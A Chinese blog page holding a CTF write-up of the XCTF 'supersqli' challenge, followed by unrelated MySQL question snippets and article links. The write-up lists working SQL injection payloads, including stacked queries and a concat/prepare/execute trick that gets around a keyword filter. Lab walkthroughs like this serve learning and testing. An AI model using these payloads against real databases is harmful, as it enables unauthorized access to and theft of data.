程序员经验分享-hwhale

xctf-supersqli

2023-11-19

xctf-supersqli 堆叠注入


本次采用的靶场xctf的supersqli

一、堆叠注入

进入靶场,发现一个提示框。先随便点一下提交,发现输出了些东西·。
输入1’,判断存在注入点。

分别输如1=1,1=2,判断为单引号注入。

1' and 1= 1%23

1' and 1= 2%23

判断字段数,得到字段数为2。

1' order by 2%23


判断数据库,但发现使用了正则过滤了关键字select|update|delete|drop|insert|where

由于无法使用select,想到了堆叠注入。

show columns from class; #返回当前表的列
show tables;  #显示数据库中的列表
show databases; #显示MySQL中的列表

开始爆表名。

-1';show tables;%23


爆字段名

-1';show columns from `1919810931114514`;%23

ps: 其中1919810931114514两边是反引号。
一些函数链接
最后爆flag

-1';Set @sql=concat('s','elect flag from `1919810931114514`');Prepare sq from @sql;execute sq;%23


得到flag

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

注入

mysql

sql

数据库

xctf-supersqli 的相关文章

  • Python SQLite3 SQL注入漏洞代码

    我知道下面的代码片段由于 format 的原因很容易受到 SQL 注入的攻击 但我不知道为什么 有谁明白为什么这段代码容易受到攻击以及我从哪里开始修复它 我知道这些代码片段使输入字段保持打开状态 以便通过 SQL 注入执行其他恶意命令 但不

  • Mysql为简单频繁查询创建排序索引性能

    我正在处理一个包含大约 400 万条消息条目的 mysql 表 并尝试根据时间戳选择最新的 50 条消息 另一个要求是返回的消息不以固定前缀开头 问题是单个查询大约占用 25 的 cpu 并且最多需要 1 5 秒 该查询经常由多个客户端执行

  • 解码Json数据数组并插入到mysql

    这个问题可能已经在这里问过 但我尝试搜索找不到它 我有如下 Json 数据 CityInfo CityCode 5599 Name DRUSKININKAI CityCode 2003 Name KAUNAS CityCode 2573 N

  • MySQL获取最后10条记录中的第一条记录

    在Mysql中 我试图获取最后10条记录中最旧的记录 为了得到最后 10 个我会简单地做SELECT FROM table ORDER BY id DESC LIMIT 10 为了获得最旧的 我只需使用 ASC 顺序 我需要首先按 DESC

  • MySql如何通过过滤多列来限制多个数字?

    我想从数据库中获取 4 个不同类别的 50 个问题 我想要 4 个不同类别中每个类别的不同数量的问题 我的结果集必须包含第一类 12 个问题 第二类 20 个问题 第三类 10 个问题和第四类 8 个问题 我的问题表中总共有 50 个问题

  • 不唯一的表/别名

    因此 我尝试使用多个联接来运行此查询 以获得我想要的精确行 但我不断收到此错误 不唯一的表 别名 ss prices 我正在运行的查询 select ss accounts id ss accounts bot acc id ss acco

  • 为什么 sql 字段名称中不应该包含逗号?

    人们一直告诉我列名中不应包含空格 我只是想知道 这是为什么 这是我为学校创建的一些数据库表遇到的问题 字段名称包括 Preble 和 Darke 相反 它们需要是 普雷布尔县 俄亥俄州 和 达克县 俄亥俄州 如果它们是行名称 我只需创建一个

  • MySQL中是否有类似Oracle中“level”的函数[重复]

    这个问题在这里已经有答案了 我面临一个场景 如果输入是 10 我想要一个数字序列 1 2 3 10 在甲骨文中levelfunction 提供了该功能 我想知道如何在 MySQL 中执行相同的任务 谢谢 您可以在 mysql 中使用此查询

  • 使用 pip3 安装 mysqlclient 时遇到问题

    我正在尝试使用 Django 设置 python 3 6 环境 安装说明说我应该安装 mysqlclient 才能连接到 mySQL 我明白了 dennis django sudo H pip3 install mysqlclient Co

  • Oracle 获取列值发生变化的行

    假设我有一张桌子 比如 ID CCTR DATE 1 2C 8 1 2018 2 2C 7 2 2018 3 2C 5 4 2017 4 2B 3 2 2017 5 2B 1 1 2017 6 UC 11 23 2016 还有其他字段 但我

  • 在 plsql 中立即执行

    如何从这段代码中得到结果 EXECUTE IMMEDIATE SELECT FROM table name through for loop 通常的方法看起来像这样 for items in select from this table l

  • MySQL 错误 1290 (HY000) --secure-file-priv 选项

    我试图在我的脚本中使用以下代码将 MySQL 脚本的结果写入文本文件 SELECT p title p content c name FROM post p LEFT JOIN category c ON p category id c i

  • 使用 mysql2 gem 获取最后插入的 id

    我有这样的代码 require mysql2 db query insert into clients Name values client 我可以通过 1 个查询返回最后插入的 ID 吗 您可以使用last id客户端实例的方法 clie

  • 执行许多插入重复键更新错误:未使用所有参数

    所以我一直在尝试使用 python 2 7 15 使用 mysql connector 执行此查询 但由于某种原因 它似乎不起作用并且总是返回错误 并非所有参数都被使用 表更新有一个主键 即 ID 这是我尝试运行此 SQL 的查询 sql

  • Spark SQL/Hive 查询通过 Join 永远持续下去

    所以我正在做一些应该很简单的事情 但显然它不在 Spark SQL 中 如果我在 MySQL 中运行以下查询 查询将在不到一秒的时间内完成 SELECT ua address id FROM user u inner join user a

  • MySQL“选择更新”行为

    根据 MySql 文档 MySql 支持多粒度锁定 MGL case 1 开放航站楼 1 连接到mysql mysql gt start transaction Query OK 0 rows affected 0 00 sec mysql

  • php 崩溃后 mysql 表被锁定

    我有一个 MySQL DB 和一个 innoDB 表 我有一个 php 页面 用于连接 锁定表 进行一些更新 然后解锁表 PHP 页面通过 wamp 与 apache 一起提供 php页面将文件上传到数据库 我决定通过上传一个大小大于分配给

  • 如何使用实体框架设置连接字符串

    我将 EF6 与 MySQL 结合使用 并有一个用于多个数据库的模型 我希望能够在我的表单中设置连接设置 如何以编程方式设置模型的连接字符串 你应该使用EntityConnectionFactory这就是您所需要的 public strin

  • 如何打印Oracle中过程的定义?

    oracle中有没有办法查看过程的结构是什么 我正在尝试记录并运行程序 并希望将实际的程序结构存储在我的日志中 您可以查询ALL SOURCE table SELECT text FROM all source WHERE owner lt

  • SQL 大表中的随机行(使用 where 子句)

    我有一个网站 人们可以在其中对汽车进行投票 向用户展示 4 辆汽车 他 她可以投票选出他们最喜欢的汽车 桌子cars有重要的列 car id int 10 not auto increment so has gaps views int 7

随机推荐

  • Lustre客户端挂载失败报错

    查看 var log messages日志 发现出现OST0001等待OST0002分配序列号的报错 Jul 26 01 36 20 mds001 kernel perf interrupt took too long 11438 gt 1

  • 即时通信工具简介

    即时通信工具 什么是即时通信 即时通信是基于网络的一种新兴应用 它最基本的特征就是信息的即时传递和用户的交互性 并可将音 视频通信 文件传输及网络聊天等业务集成为一体 为人们开辟了一种新型的沟通途径 简单地讲 即时通信是一种使人们能在网络上

  • UP9616Q自带识别功能降压QC3.0车载快充芯片方案

    UP9616Q是一个高效率降压转换器能够提供高达3 3A充电器输出电流接口和一个宽范围输入电压 输入电压可从8V至32V 可工作在CV 恒定输出电压 模式 或 CC 恒定输出电流 模式 并带有电流限制功能 UP9616具有恒定的输出QC高通

  • Hyperledger Fabric配置文件解析-configtx.yaml

    configtx yaml简介 transaction的英文缩写是TX 表示交易 configtx表示交易配置 所以和交易相关的配置 如应用通道 锚节点 Orderer服务等 都是在configtx yaml文件中配置的 它主要生成通道创世

  • 自学黑客【网络安全】,一般人我劝你还是算了吧

    一 前言 1 这是一条坚持的道路 三分钟的热情可以放弃往下看了 2 多练多想 不要离开了教程什么都不会了 最好看完教程自己独立完成技术方面的开发 3 有时多 google baidu 我们往往都遇不到好心的大神 谁会无聊天天给你做解答 4

  • U盘制作成启动盘后容量变小怎么恢复

    今天用雨林木风做U盘启动后发现原本29G的可用空间只有25G可用了 怎么格式化都没办法还原 最后百度过后才知道出现这一问题的主要原因是在制作启动u盘时 软件会占用u盘部分空间进行制作并将这些空间隐藏起来 所以导致u盘的容量变小 恢复的方式也

  • maven笔记:maven创建archetype时的package路径错乱问题

    在使用mvn archetype create from project创建代码工程模板时 代码模板的import位置会出现 package 有时候可能会出现 紊乱 情况 比如org apache log4j 会被替换成net pgia i

  • centos7安装redis

    文章目录 1 检查是否安装Redis依赖 2 解压并编译安装 3 设置开机启动 3 1配置文件中允许后台运行 3 2redis服务文件中修改 1 检查是否安装Redis依赖 Redis是基于C语言编写的 需要gcc依赖 检查gcc是否安装

  • 使用Fragment作为Item的ViewPager不更新问题.

    最近做一个项目 需要在内存里动态切换ViewPager里面的Fragment 但是无论是我创建ViewPager还是刷新Adapter 只要被展示过的Fragment就不刷新 蛋疼了一下午 终于研究出来鸟 我首先使用的是fragmentPa

  • C语言实现的贪吃蛇(无EasyX,详解)

    前言 或许厌倦了枯燥的做题 那就学学贪吃蛇 激发你的学习乐趣吧 你将进一步加深对结构体 单链表 函数 循环等基础的理解 希望对你有所帮助 纯C实现的贪吃蛇 前言 代码效果 视频 学习新函数 让你的代码变得 高大上 任意位置输出 重点注意事项

  • SaveRenderTextureToPNG保存贴图到本地

    将RenderTexture保存成一张png图片 public bool SaveRenderTextureToPNG RenderTexture rt string contents string pngName RenderTextur

  • Nginx-内存池

    系列文章目录 Nginx资源目录简介 第一章 Nginx学习入门之内存池分析 文章目录 系列文章目录 Ngxin内存池简介 一 nginx内存池结构体 二 使用步骤 1 Ngix 内存池原理 内存作用范围 总结 Ngxin内存池简介 Ngi

  • maven 教程

    Maven项目管理 Maven是什么 Maven是Apache下的项目管理工具 它由纯Java语言开发 可以帮助我们更方便的管理和构建Java项目 为什么要使用Maven jar包管理 从Maven中央仓库获取标准的规范的jar包以及相关依

  • 故障:fork failed:Resource Temporarily Unavailable解决方案

    故障 fork failed Resource Temporarily Unavailable解决方案 在一次crontab bkapp txt导入N多定时任务时候 该用户无法执行任何命令 再ssh连报fork failed Resourc

  • oVirt快速安装指南

    介绍 此文档是针对第一次安装使用oVirt的用户 带领你们逐步完成oVirt的安装 基本环境设置和安装虚拟机 css 系统需求 下面介绍的系统要求只适合典型的中小规模环境的安装 若是对于安装 系统规划和负载均衡有特殊要求的用户 也可使用下面

  • 如何看待中小企业实现数字化转型难的问题?_光点科技

    中小企业在今天的商业环境中扮演着至关重要的角色 它们为就业创造了大量机会 促进了创新 支持了经济增长 然而 中小企业在数字化转型方面面临着许多挑战 这些挑战使得实现数字化转型变得困难 资源限制 中小企业通常拥有有限的资金和人力资源 这使得数

  • Onvif协议学习:12、修改分辨率

    Onvif协议学习 12 修改分辨率 文章目录 Onvif协议学习 12 修改分辨率 1 原理简介 2 函数接口 3 编码流程 4 示例代码 原文链接 https blog csdn net benkaoya article details

  • fc2 php,fc2fans_club.py

    import re from lxml import etree need install import json import ADC function def getTitle htmlcode 获取厂商 print htmlcode

  • 简单看看TypeScript、C# 和 Delphi 这三种编程语言

    TypeScript C 和 Delphi 是三种不同的编程语言 它们都有自己的特点和适用领域 在本篇博客中 我们将对这三种语言进行比较和介绍 分析它们的共同点和区别 TypeScript 是由微软公司的 Anders Hejlsberg

  • xctf-supersqli

    xctf supersqli 堆叠注入 一 堆叠注入 本次采用的靶场xctf的supersqli 一 堆叠注入 进入靶场 发现一个提示框 先随便点一下提交 发现输出了些东西 输入1 判断存在注入点 分别输如1 1 1 2 判断为单引号注入

热门标签